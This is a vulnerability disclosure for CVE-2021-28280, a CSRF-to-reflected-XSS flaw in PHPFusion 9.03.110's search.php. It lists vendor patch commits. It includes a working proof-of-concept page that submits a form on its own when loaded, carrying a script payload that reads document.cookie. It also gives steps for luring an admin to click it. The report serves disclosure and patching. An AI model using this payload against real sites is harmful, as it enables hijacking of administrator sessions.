Headline
CVE-2021-28280: Online Notepad - CSRF to Reflected XSS vulnerability on PHPFusion 9.03.110 CMS
CSRF + Cross-site scripting (XSS) vulnerability in search.php in PHPFusion 9.03.110 allows remote attackers to inject arbitrary web script or HTML
CSRF to Reflected XSS vulnerability on PHPFusion 9.03.110 CMS
## Bug Description
Hi. I found a CSRF in the search.php in PHPFusion 9.03.110 CMS. This vulnerability allows remote attackers to inject arbitrary web script or HTML.
## How to Reproduce
Steps to reproduce the behavior:
1. Create a CSRF POC using the following code.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Cross Site Request Forgery (Edit Existing Admin details)</title>
</head>
<body onload="javascript:fireForms()">
<script language="JavaScript">
function fireForms()
{
`var count = 2;`
`var i=0;`
`for(i=0; i<count; i++)`
`{`
`document.forms[i].submit();`
`}`
}
</script>
<H2>Cross Site Request Forgery (Edit Existing Admin details)</H2>
<form method="POST" name="form0" action="http://localhost/PHPFusion/search.php">
<input type="hidden" name="stext" value="'><script>alert(document.cookie)</script>"/>
<input type="hidden" name="form_id" value="advanced_search_form"/>
<input type="hidden" name="method" value="OR"/>
<input type="hidden" name="search" value="Search"/>
<input type="hidden" name="stype" value="all"/>
</form>
</body>
</html>
2. Replace the URI to path to PHPFusion folder.
3. Send the link script to the victim (admin) to make them click.
4. The script has been triggered on victim browser.
## Server Information
Xampp on Windows 10
### PHP Operating System
Windows NT DESKTOP-BDPIT37 10.0 build 18363 (Windows 10) AMD64
### PHP Version
PHP Version 7.4.15
# Vendor Response
The fixes will be included in next update, patched here:
https://github.com/PHPFusion/PHPFusion/commit/08d6c2ea49bd06fcce32275252f5f25abe61965c
https://github.com/PHPFusion/PHPFusion/commit/fda266c3bb35c650a8c4c51b6923abdfb66ef5cd
https://github.com/PHPFusion/PHPFusion/commit/1c2b32321cf11ed1cd3ff835f8da0d172c849ce6
https://github.com/PHPFusion/PHPFusion/commit/da9f89ae70219f357fba6fffd2dae1ec886d8a3b